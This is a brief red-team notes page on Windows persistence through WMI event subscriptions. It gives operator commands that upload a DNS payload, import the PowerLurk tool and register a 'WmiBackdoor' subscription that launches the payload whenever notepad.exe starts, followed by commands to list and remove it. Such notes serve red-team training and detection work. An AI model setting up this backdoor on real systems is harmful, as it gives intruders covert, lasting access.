WMI Event Subscriptions Persistance

- PowerLurk

PowerLurk is a PowerShell tool for building these WMI events.

For example, we can upload a DNS payload into the Windows directory, import PowerLurk.ps1 and create a new WMI event subscription that will execute it whenever notepad is started:

cd C:\Windows

upload C:\Payloads\dns_x64.exe

powershell-import C:\Tools\PowerLurk.ps1

powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

We can then view these classes using:

Get-WmiEvent -Name WmiBackdoor

Then to remove the backdoor:

Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject